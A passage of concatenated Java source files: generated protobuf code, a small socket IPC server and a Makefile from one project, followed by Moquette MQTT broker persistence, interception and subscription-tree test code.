memoizedIsInitialized = 0;
return false;
}
if (!hasName()) {
memoizedIsInitialized = 0;
return false;
}
memoizedIsInitialized = 1;
return true;
}
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
getSerializedSize();
if (((bitField0_ & 0x00000001) == 0x00000001)) {
output.writeEnum(1, type_.getNumber());
}
if (((bitField0_ & 0x00000002) == 0x00000002)) {
output.writeBytes(2, getNameBytes());
}
if (((bitField0_ & 0x00000004) == 0x00000004)) {
output.writeBytes(3, getDataBytes());
}
getUnknownFields().writeTo(output);
}
private int memoizedSerializedSize = -1;
public int getSerializedSize() {
int size = memoizedSerializedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) == 0x00000001)) {
size += com.google.protobuf.CodedOutputStream
.computeEnumSize(1, type_.getNumber());
}
if (((bitField0_ & 0x00000002) == 0x00000002)) {
size += com.google.protobuf.CodedOutputStream
.computeBytesSize(2, getNameBytes());
}
if (((bitField0_ & 0x00000004) == 0x00000004)) {
size += com.google.protobuf.CodedOutputStream
.computeBytesSize(3, getDataBytes());
}
size += getUnknownFields().getSerializedSize();
memoizedSerializedSize = size;
return size;
}
private static final long serialVersionUID = 0L;
@java.lang.Override
protected java.lang.Object writeReplace()
throws java.io.ObjectStreamException {
return super.writeReplace();
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.zlalanne.Message.Command parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.zlalanne.Message.Command parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.zlalanne.Message.Command parseFrom(java.io.InputStream input)
throws java.io.IOException {
return PARSER.parseFrom(input);
}
public static com.zlalanne.Message.Command parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return PARSER.parseFrom(input, extensionRegistry);
}
public static com.zlalanne.Message.Command parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return PARSER.parseDelimitedFrom(input);
}
public static com.zlalanne.Message.Command parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return PARSER.parseDelimitedFrom(input, extensionRegistry);
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return PARSER.parseFrom(input);
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return PARSER.parseFrom(input, extensionRegistry);
}
public static Builder newBuilder() { return Builder.create(); }
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder(com.zlalanne.Message.Command prototype) {
return newBuilder().mergeFrom(prototype);
}
public Builder toBuilder() { return newBuilder(this); }
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessage.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code Command}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessage.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:Command)
com.zlalanne.Message.CommandOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return com.zlalanne.Message.internal_static_Command_descriptor;
}
protected com.google.protobuf.GeneratedMessage.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.zlalanne.Message.internal_static_Command_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.zlalanne.Message.Command.class, com.zlalanne.Message.Command.Builder.class);
}
// Construct using com.zlalanne.Message.Command.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessage.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessage.alwaysUseFieldBuilders) {
}
}
private static Builder create() {
return new Builder();
}
public Builder clear() {
super.clear();
type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
bitField0_ = (bitField0_ & ~0x00000001);
name_ = "";
bitField0_ = (bitField0_ & ~0x00000002);
data_ = "";
bitField0_ = (bitField0_ & ~0x00000004);
return this;
}
public Builder clone() {
return create().mergeFrom(buildPartial());
}
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return com.zlalanne.Message.internal_static_Command_descriptor;
}
public com.zlalanne.Message.Command getDefaultInstanceForType() {
return com.zlalanne.Message.Command.getDefaultInstance();
}
public com.zlalanne.Message.Command build() {
com.zlalanne.Message.Command result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
public com.zlalanne.Message.Command buildPartial() {
com.zlalanne.Message.Command result = new com.zlalanne.Message.Command(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) == 0x00000001)) {
to_bitField0_ |= 0x00000001;
}
result.type_ = type_;
if (((from_bitField0_ & 0x00000002) == 0x00000002)) {
to_bitField0_ |= 0x00000002;
}
result.name_ = name_;
if (((from_bitField0_ & 0x00000004) == 0x00000004)) {
to_bitField0_ |= 0x00000004;
}
result.data_ = data_;
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof com.zlalanne.Message.Command) {
return mergeFrom((com.zlalanne.Message.Command)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(com.zlalanne.Message.Command other) {
if (other == com.zlalanne.Message.Command.getDefaultInstance()) return this;
if (other.hasType()) {
setType(other.getType());
}
if (other.hasName()) {
bitField0_ |= 0x00000002;
name_ = other.name_;
onChanged();
}
if (other.hasData()) {
bitField0_ |= 0x00000004;
data_ = other.data_;
onChanged();
}
this.mergeUnknownFields(other.getUnknownFields());
return this;
}
public final boolean isInitialized() {
if (!hasType()) {
return false;
}
if (!hasName()) {
return false;
}
return true;
}
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
com.zlalanne.Message.Command parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (com.zlalanne.Message.Command) e.getUnfinishedMessage();
throw e;
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private int bitField0_;
private com.zlalanne.Message.Command.CommandType type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public boolean hasType() {
return ((bitField0_ & 0x00000001) == 0x00000001);
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public com.zlalanne.Message.Command.CommandType getType() {
return type_;
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public Builder setType(com.zlalanne.Message.Command.CommandType value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
type_ = value;
onChanged();
return this;
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public Builder clearType() {
bitField0_ = (bitField0_ & ~0x00000001);
type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
onChanged();
return this;
}
private java.lang.Object name_ = "";
/**
* <code>required string name = 2;</code>
*/
public boolean hasName() {
return ((bitField0_ & 0x00000002) == 0x00000002);
}
/**
* <code>required string name = 2;</code>
*/
public java.lang.String getName() {
java.lang.Object ref = name_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
name_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>required string name = 2;</code>
*/
public com.google.protobuf.ByteString
getNameBytes() {
java.lang.Object ref = name_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
name_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>required string name = 2;</code>
*/
public Builder setName(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000002;
name_ = value;
onChanged();
return this;
}
/**
* <code>required string name = 2;</code>
*/
public Builder clearName() {
bitField0_ = (bitField0_ & ~0x00000002);
name_ = getDefaultInstance().getName();
onChanged();
return this;
}
/**
* <code>required string name = 2;</code>
*/
public Builder setNameBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000002;
name_ = value;
onChanged();
return this;
}
private java.lang.Object data_ = "";
/**
* <code>optional string data = 3;</code>
*/
public boolean hasData() {
return ((bitField0_ & 0x00000004) == 0x00000004);
}
/**
* <code>optional string data = 3;</code>
*/
public java.lang.String getData() {
java.lang.Object ref = data_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
data_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string data = 3;</code>
*/
public com.google.protobuf.ByteString
getDataBytes() {
java.lang.Object ref = data_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
data_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string data = 3;</code>
*/
public Builder setData(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000004;
data_ = value;
onChanged();
return this;
}
/**
* <code>optional string data = 3;</code>
*/
public Builder clearData() {
bitField0_ = (bitField0_ & ~0x00000004);
data_ = getDefaultInstance().getData();
onChanged();
return this;
}
/**
* <code>optional string data = 3;</code>
*/
public Builder setDataBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000004;
data_ = value;
onChanged();
return this;
}
// @@protoc_insertion_point(builder_scope:Command)
}
static {
defaultInstance = new Command(true);
defaultInstance.initFields();
}
// @@protoc_insertion_point(class_scope:Command)
}
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_Command_descriptor;
private static
com.google.protobuf.GeneratedMessage.FieldAccessorTable
internal_static_Command_fieldAccessorTable;
public static com.google.protobuf.Descriptors.FileDescriptor
getDescriptor() {
return descriptor;
}
private static com.google.protobuf.Descriptors.FileDescriptor
descriptor;
static {
java.lang.String[] descriptorData = {
"\n\rmessage.proto\"\203\001\n\007Command\022\"\n\004type\030\001 \002(" +
"\0162\024.Command.CommandType\022\014\n\004name\030\002 \002(\t\022\014\n" +
"\004data\030\003 \001(\t\"8\n\013CommandType\022\016\n\nSTART_TEST" +
"\020\000\022\013\n\007RESULTS\020\001\022\014\n\010SHUTDOWN\020\002B\016\n\014com.zla" +
"lanne"
};
com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner =
new com.google.protobuf.Descriptors.FileDescriptor. InternalDescriptorAssigner() {
public com.google.protobuf.ExtensionRegistry assignDescriptors(
com.google.protobuf.Descriptors.FileDescriptor root) {
descriptor = root;
return null;
}
};
com.google.protobuf.Descriptors.FileDescriptor
.internalBuildGeneratedFileFrom(descriptorData,
new com.google.protobuf.Descriptors.FileDescriptor[] {
}, assigner);
internal_static_Command_descriptor =
getDescriptor().getMessageTypes().get(0);
internal_static_Command_fieldAccessorTable = new
com.google.protobuf.GeneratedMessage.FieldAccessorTable(
internal_static_Command_descriptor,
new java.lang.String[] { "Type", "Name", "Data", });
}
// @@protoc_insertion_point(outer_class_scope)
}
<|start_filename|>java/src/com/zlalanne/Server.java<|end_filename|>
package com.zlalanne;
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import com.zlalanne.Message.Command;
public class Server {
final private int PORT = 9999;
private ServerSocket serverSocket;
public Server() {
try {
serverSocket = new ServerSocket(PORT);
} catch (IOException e) {
e.printStackTrace();
}
}
public void run() {
boolean running = true;
try {
System.out.println("Waiting for connection on port " + PORT);
Socket clientSocket = serverSocket.accept();
System.out.println("Connection established. Waiting for messages...");
OutputStream os = clientSocket.getOutputStream();
InputStream is = clientSocket.getInputStream();
while(running) {
Command cmd = Command.parseDelimitedFrom(is);
switch(cmd.getType()) {
case START_TEST: {
// Process Start_TEST
System.out.println("Processing START_TEST");
System.out.println("Running test " + cmd.getName());
break;
}
case SHUTDOWN: {
System.out.println("Stopping the server...");
running = false;
break;
}
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
<|start_filename|>Makefile<|end_filename|>
#
# Makefile to call protocol buffer compiler for Java/Python
#
CC :=protoc
SRC :=message.proto
PYTHON_OUT :=python/message_pb2.py
JAVA_OUT :=java/src/com/zlalanne/Message.java
all: $(PYTHON_OUT) $(JAVA_OUT)
$(PYTHON_OUT): $(SRC)
$(CC) $(SRC) --python_out=$(dir $@)
$(JAVA_OUT): $(SRC)
$(CC) $(SRC) --java_out=$(dir $@)../../
clean:
$(RM) $(PYTHON_OUT)
$(RM) $(JAVA_OUT)
| zlalanne/java-python-ipc-protobuf |
<|start_filename|>broker/src/main/java/io/moquette/persistence/ByteBufDataType.java<|end_filename|>
/*
* Copyright (c) 2012-2021 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.persistence;
import io.netty.buffer.ByteBuf;
import io.netty.buffer.Unpooled;
import org.h2.mvstore.DataUtils;
import org.h2.mvstore.WriteBuffer;
import java.nio.ByteBuffer;
public final class ByteBufDataType implements org.h2.mvstore.type.DataType {
@Override
public int compare(Object a, Object b) {
return 0;
}
@Override
public int getMemory(Object obj) {
if (!(obj instanceof ByteBuf)) {
throw new IllegalArgumentException("Expected instance of ByteBuf but found " + obj.getClass());
}
final int payloadSize = ((ByteBuf) obj).readableBytes();
return 4 + payloadSize;
}
@Override
public void read(ByteBuffer buff, Object[] obj, int len, boolean key) {
for (int i = 0; i < len; i++) {
obj[i] = read(buff);
}
}
@Override
public void write(WriteBuffer buff, Object[] obj, int len, boolean key) {
for (int i = 0; i < len; i++) {
write(buff, obj[i]);
}
}
@Override
public ByteBuf read(ByteBuffer buff) {
final int payloadSize = buff.getInt();
byte[] payload = new byte[payloadSize];
buff.get(payload);
return Unpooled.wrappedBuffer(payload);
}
@Override
public void write(WriteBuffer buff, Object obj) {
final ByteBuf casted = (ByteBuf) obj;
final int payloadSize = casted.readableBytes();
byte[] rawBytes = new byte[payloadSize];
casted.copy().readBytes(rawBytes).release();
buff.putInt(payloadSize);
buff.put(rawBytes);
}
}
<|start_filename|>broker/src/main/java/io/moquette/interception/AbstractInterceptHandler.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.interception;
import io.moquette.interception.messages.InterceptAcknowledgedMessage;
import io.moquette.interception.messages.InterceptConnectMessage;
import io.moquette.interception.messages.InterceptConnectionLostMessage;
import io.moquette.interception.messages.InterceptDisconnectMessage;
import io.moquette.interception.messages.InterceptPublishMessage;
import io.moquette.interception.messages.InterceptSubscribeMessage;
import io.moquette.interception.messages.InterceptUnsubscribeMessage;
/**
* Basic abstract class usefull to avoid empty methods creation in subclasses.
*/
public abstract class AbstractInterceptHandler implements InterceptHandler {
@Override
public Class<?>[] getInterceptedMessageTypes() {
return InterceptHandler.ALL_MESSAGE_TYPES;
}
@Override
public void onConnect(InterceptConnectMessage msg) {
}
@Override
public void onDisconnect(InterceptDisconnectMessage msg) {
}
@Override
public void onConnectionLost(InterceptConnectionLostMessage msg) {
}
@Override
public void onPublish(InterceptPublishMessage msg) {
msg.getPayload().release();
}
@Override
public void onSubscribe(InterceptSubscribeMessage msg) {
}
@Override
public void onUnsubscribe(InterceptUnsubscribeMessage msg) {
}
@Override
public void onMessageAcknowledged(InterceptAcknowledgedMessage msg) {
}
}
<|start_filename|>broker/src/test/java/io/moquette/broker/subscriptions/CTrieTest.java<|end_filename|>
/*
* Copyright (c) 2012-2018 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.broker.subscriptions;
import io.netty.handler.codec.mqtt.MqttQoS;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import java.util.Optional;
import java.util.Set;
import static io.moquette.broker.subscriptions.Topic.asTopic;
import static org.assertj.core.api.Assertions.assertThat;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
import static org.junit.jupiter.api.Assertions.assertTrue;
public class CTrieTest {
private CTrie sut;
@BeforeEach
public void setUp() {
sut = new CTrie();
}
@Test
public void testAddOnSecondLayerWithEmptyTokenOnEmptyTree() {
//Exercise
sut.addToTree(clientSubOnTopic("TempSensor1", "/"));
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/"));
assertTrue(matchedNode.isPresent(), "Node on path / must be present");
//verify structure, only root INode and the first CNode should be present
assertThat(this.sut.root.mainNode().subscriptions).isEmpty();
assertThat(this.sut.root.mainNode().allChildren()).isNotEmpty();
INode firstLayer = this.sut.root.mainNode().allChildren().get(0);
assertThat(firstLayer.mainNode().subscriptions).isEmpty();
assertThat(firstLayer.mainNode().allChildren()).isNotEmpty();
INode secondLayer = firstLayer.mainNode().allChildren().get(0);
assertThat(secondLayer.mainNode().subscriptions).isNotEmpty();
assertThat(secondLayer.mainNode().allChildren()).isEmpty();
}
@Test
public void testAddFirstLayerNodeOnEmptyTree() {
//Exercise
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp"));
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertTrue(matchedNode.isPresent(), "Node on path /temp must be present");
assertFalse(matchedNode.get().subscriptions.isEmpty());
}
@Test
public void testLookup() {
final Subscription existingSubscription = clientSubOnTopic("TempSensor1", "/temp");
sut.addToTree(existingSubscription);
//Exercise
final Optional<CNode> matchedNode = sut.lookup(asTopic("/humidity"));
//Verify
assertFalse(matchedNode.isPresent(), "Node on path /humidity can't be present");
}
@Test
public void testAddNewSubscriptionOnExistingNode() {
final Subscription existingSubscription = clientSubOnTopic("TempSensor1", "/temp");
sut.addToTree(existingSubscription);
//Exercise
final Subscription newSubscription = clientSubOnTopic("TempSensor2", "/temp");
sut.addToTree(newSubscription);
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertTrue(matchedNode.isPresent(), "Node on path /temp must be present");
final Set<Subscription> subscriptions = matchedNode.get().subscriptions;
assertTrue(subscriptions.contains(newSubscription));
}
@Test
public void testAddNewDeepNodes() {
sut.addToTree(clientSubOnTopic("TempSensorRM", "/italy/roma/temp"));
sut.addToTree(clientSubOnTopic("TempSensorFI", "/italy/firenze/temp"));
sut.addToTree(clientSubOnTopic("HumSensorFI", "/italy/roma/humidity"));
final Subscription happinessSensor = clientSubOnTopic("HappinessSensor", "/italy/happiness");
sut.addToTree(happinessSensor);
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/italy/happiness"));
assertTrue(matchedNode.isPresent(), "Node on path /italy/happiness must be present");
final Set<Subscription> subscriptions = matchedNode.get().subscriptions;
assertTrue(subscriptions.contains(happinessSensor));
}
static Subscription clientSubOnTopic(String clientID, String topicName) {
return new Subscription(clientID, asTopic(topicName), null);
}
@Test
public void givenTreeWithSomeNodeWhenRemoveContainedSubscriptionThenNodeIsUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp"));
//Exercise
sut.removeFromTree(asTopic("/temp"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void givenTreeWithSomeNodeUnsubscribeAndResubscribeCleanTomb() {
sut.addToTree(clientSubOnTopic("TempSensor1", "test"));
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.addToTree(clientSubOnTopic("TempSensor1", "test"));
assertEquals(1, sut.root.mainNode().allChildren().size()); // looking to see if TNode is cleaned up
}
@Test
public void givenTreeWithSomeNodeWhenRemoveMultipleTimes() {
sut.addToTree(clientSubOnTopic("TempSensor1", "test"));
// make sure no TNode exceptions
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.removeFromTree(asTopic("test"), "TempSensor1");
sut.removeFromTree(asTopic("test"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void givenTreeWithSomeDeepNodeWhenRemoveMultipleTimes() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/test/me/1/2/3"));
// make sure no TNode exceptions
sut.removeFromTree(asTopic("/test/me/1/2/3"), "TempSensor1");
sut.removeFromTree(asTopic("/test/me/1/2/3"), "TempSensor1");
sut.removeFromTree(asTopic("/test/me/1/2/3"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/temp"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void givenTreeWithSomeNodeHierarchyWhenRemoveContainedSubscriptionThenNodeIsUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/1"));
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/2"));
//Exercise
sut.removeFromTree(asTopic("/temp/1"), "TempSensor1");
sut.removeFromTree(asTopic("/temp/1"), "TempSensor1");
final Set<Subscription> matchingSubs = sut.recursiveMatch(asTopic("/temp/2"));
//Verify
final Subscription expectedMatchingsub = new Subscription("TempSensor1", asTopic("/temp/2"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs).contains(expectedMatchingsub);
}
@Test
public void givenTreeWithSomeNodeHierarchWhenRemoveContainedSubscriptionSmallerThenNodeIsNotUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/1"));
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp/2"));
//Exercise
sut.removeFromTree(asTopic("/temp"), "TempSensor1");
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("/temp/1"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("/temp/2"));
//Verify
// not clear to me, but I believe /temp unsubscribe should not unsub you from downstream /temp/1 or /temp/2
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("/temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor1", asTopic("/temp/2"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
}
@Test
public void givenTreeWithDeepNodeWhenRemoveContainedSubscriptionThenNodeIsUpdated() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/bah/bin/bash"));
sut.removeFromTree(asTopic("/bah/bin/bash"), "TempSensor1");
//Verify
final Optional<CNode> matchedNode = sut.lookup(asTopic("/bah/bin/bash"));
assertFalse(matchedNode.isPresent(), "Node on path /temp can't be present");
}
@Test
public void testMatchSubscriptionNoWildcards() {
sut.addToTree(clientSubOnTopic("TempSensor1", "/temp"));
//Exercise
final Set<Subscription> matchingSubs = sut.recursiveMatch(asTopic("/temp"));
//Verify
final Subscription expectedMatchingsub = new Subscription("TempSensor1", asTopic("/temp"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs).contains(expectedMatchingsub);
}
@Test
public void testRemovalInnerTopicOffRootSameClient() {
sut.addToTree(clientSubOnTopic("TempSensor1", "temp"));
sut.addToTree(clientSubOnTopic("TempSensor1", "temp/1"));
//Exercise
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("temp/1"));
//Verify
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("temp"), MqttQoS.AT_MOST_ONCE);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor1", asTopic("temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
sut.removeFromTree(asTopic("temp"), "TempSensor1");
//Exercise
final Set<Subscription> matchingSubs3 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs4 = sut.recursiveMatch(asTopic("temp/1"));
assertThat(matchingSubs3).doesNotContain(expectedMatchingsub1);
assertThat(matchingSubs4).contains(expectedMatchingsub2);
}
@Test
public void testRemovalInnerTopicOffRootDiffClient() {
sut.addToTree(clientSubOnTopic("TempSensor1", "temp"));
sut.addToTree(clientSubOnTopic("TempSensor2", "temp/1"));
//Exercise
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("temp/1"));
//Verify
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("temp"), MqttQoS.AT_MOST_ONCE);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor2", asTopic("temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
sut.removeFromTree(asTopic("temp"), "TempSensor1");
//Exercise
final Set<Subscription> matchingSubs3 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs4 = sut.recursiveMatch(asTopic("temp/1"));
assertThat(matchingSubs3).doesNotContain(expectedMatchingsub1);
assertThat(matchingSubs4).contains(expectedMatchingsub2);
}
@Test
public void testRemovalOuterTopicOffRootDiffClient() {
sut.addToTree(clientSubOnTopic("TempSensor1", "temp"));
sut.addToTree(clientSubOnTopic("TempSensor2", "temp/1"));
//Exercise
final Set<Subscription> matchingSubs1 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs2 = sut.recursiveMatch(asTopic("temp/1"));
//Verify
final Subscription expectedMatchingsub1 = new Subscription("TempSensor1", asTopic("temp"), MqttQoS.AT_MOST_ONCE);
final Subscription expectedMatchingsub2 = new Subscription("TempSensor2", asTopic("temp/1"), MqttQoS.AT_MOST_ONCE);
assertThat(matchingSubs1).contains(expectedMatchingsub1);
assertThat(matchingSubs2).contains(expectedMatchingsub2);
sut.removeFromTree(asTopic("temp/1"), "TempSensor2");
//Exercise
final Set<Subscription> matchingSubs3 = sut.recursiveMatch(asTopic("temp"));
final Set<Subscription> matchingSubs4 = sut.recursiveMatch(asTopic("temp/1"));
assertThat(matchingSubs3).contains(expectedMatchingsub1);
assertThat(matchingSubs4).doesNotContain(expectedMatchingsub2);
}
}
<|start_filename|>broker/src/test/java/io/moquette/integration/MessageCollector.java<|end_filename|>
/*
* Copyright (c) 2012-2016 The original author or authors
* ------------------------------------------------------
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse Public License v1.0
* and Apache License v2.0 which accompanies this distribution.
*
* The Eclipse Public License is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* The Apache License v2.0 is available at
* http://www.opensource.org/licenses/apache2.0.php
*
* You may elect to redistribute this code under either of these licenses.
*/
package io.moquette.integration;
import org.eclipse.paho.client.mqttv3.IMqttDeliveryToken;
import org.eclipse.paho.client.mqttv3.MqttCallback;
import org.eclipse.paho.client.mqttv3.MqttMessage;
import java.util.concurrent.*;
/**
* Used in test to collect all messages received asynchronously by MqttClient.
*/
public class MessageCollector implements MqttCallback {
private static final class ReceivedMessage {
private final MqttMessage message;
private final String topic;
private ReceivedMessage(MqttMessage message, String topic) {
this.message = message;
this.topic = topic;
}
}
private BlockingQueue<ReceivedMessage> m_messages = new LinkedBlockingQueue<>();
private boolean m_connectionLost;
private volatile boolean messageReceived = false;
/**
* Return the message from the queue if not empty, else return null with wait period.
*/
public MqttMessage getMessageImmediate() {
if (m_messages.isEmpty()) {
return null;
}
try {
return m_messages.take().message;
} catch (InterruptedException e) {
return null;
}
}
public MqttMessage retrieveMessage() throws InterruptedException {
final ReceivedMessage content = m_messages.take();
messageReceived = false;
return content.message;
}
public String retrieveTopic() throws InterruptedException {
final ReceivedMessage content = m_messages.take();
messageReceived = false;
return content.topic;
}
public boolean isMessageReceived() {
return messageReceived;
}
void reinit() {
m_messages = new LinkedBlockingQueue<>();
m_connectionLost = false;
messageReceived = false;
}
public boolean connectionLost() {
return m_connectionLost;
}
@Override
